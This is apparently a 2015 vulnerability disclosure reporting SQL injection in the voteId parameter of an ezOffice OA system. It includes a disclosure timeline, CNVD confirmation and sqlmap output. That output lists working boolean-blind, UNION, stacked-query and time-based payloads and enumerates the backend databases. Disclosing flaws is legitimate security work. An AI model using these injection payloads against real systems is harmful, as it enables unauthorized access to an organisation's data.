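2015-09-24: Details reported to the vendor; awaiting vendor response
2015-09-28: CNCERT (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the notifying body
2015-10-08: Details disclosed to core white hats and experts in related fields
2015-10-18: Details disclosed to regular white hats
2015-10-28: Details disclosed to intern white hats
2015-11-12: Details disclosed to the public
Full OA data leak
The voteId parameter of http://**.**.**.**/voteDisp.jsp?voteId=15 is vulnerable to SQL injection.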
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Parameter: voteId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: voteId=15 AND 2576=2576

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: voteId=15; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: voteId=15 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] ahsft
[*] master
[*] model
[*] msdb
[*] tempdb
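After running a lot of requests the site becomes unreachable, so there is probably a firewall. ezoffice is an OA collaborative office software product from Wanhu Network (万户网络), which for years has focused mainly on the mid-to-high-end market. All the data in the OA is exposed. I did not touch anything, so please don't come knocking on my door.
It's Mid-Autumn Festival... the mooncakes I redeemed won't take until after New Year to arrive, will they?
Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-09-28 19:16
CNVD confirmed and reproduced the reported issue and has forwarded it via CNCERT to the Anhui branch center, which will coordinate handling with the organization that manages the website.
None yet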